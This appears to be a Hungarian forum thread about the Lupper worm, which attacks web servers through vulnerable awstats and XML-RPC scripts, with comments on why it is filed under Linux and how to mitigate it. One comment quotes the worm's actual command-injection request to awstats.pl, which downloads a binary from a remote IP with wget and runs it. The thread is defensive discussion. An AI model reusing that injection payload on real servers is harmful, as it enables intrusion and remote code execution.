Lupper.worm

Címkék

A McAffe szerint egy worm járja az internetet és támadja a webszervereket. Sebezhető PHP/CGI szkripteket keres (a közeli múltban ismerté vált awstat, xml-rpc, stb.). A hibajegy szerint ez a mostani féreg egy módosított leszármazottja a Linux/Slapper és BSD/Scalper worm-oknak.Mivel leszármazott, azokhoz hasonlóan scanneli a hálózatot, ``fertőz'', és terjed tovább. A sikeres támadás esetén az UDP 7111 / UDP 7222 portokon hallgat, és a /tmp-be egy lupii nevű file-t dob.

Bővebb infó itt.

(Valaki elmondaná nekem, hogy ez miért Linux hiba? A féreg neve Linux/Lupper.worm.)

Hozzászólások

>> Valaki elmondaná nekem, hogy ez miért Linux hiba? A féreg neve Linux/Lupper.worm

a kozlemenyben az all, hogy ez a linux/slapper leszarmazottja, annal pedig ez: "The worm only attacks specific Linux distributions by sending an initial[...]"

Micskó Gábor wrote:
> Mivel leszármazott, azokhoz hasonlóan scanneli a hálózatot, ``fertőz'', és
> terjed tovább. A sikeres támadás esetén az UDP 7111 / UDP 7222 portokon
> hallgat, és a /tmp egy lupii nevű file-t dob.
> (Valaki elmondaná nekem, hogy ez miért Linux hiba? A féreg neve
> Linux/Lupper.worm.)
Gondolom a kulcs a "sikeres támadás esetén az UDP 7111 / UDP 7222
portokon hallgat" mondatban keresendő. (linuxos binárist nyom fel)

Gyorsan elolvastam a McAffe oldalán a leírást.

Azt vettem ki belőle, hogy csak akkor tud érvényesülni, ha php -n vagy valamilyen cgi -n keresztül le tudja magát tölteni. Pl. ha a php -ben az allow_url_fopen tiltva van és persze a rendszerparancsok meghívása is, akkor tud más módon fertőzni? Pillanatnyilag fut az awstats is, mert ezzel generálom a statisztikákat. Jelenthet ez fertőzési veszélyt? Ideig szüneteltessem az awstats -ot?

laci

slashdot-on is kinnt van. az egyik hozzaszolas:

The command it runs is:

|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

It is passed to awstats.pl in a request like:

GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1

There are also POST request to xmlrpc.php pages, like:

POST /drupal/xmlrpc.php HTTP/1.1

So if you have /tmp mounted noexec this should not be a problem.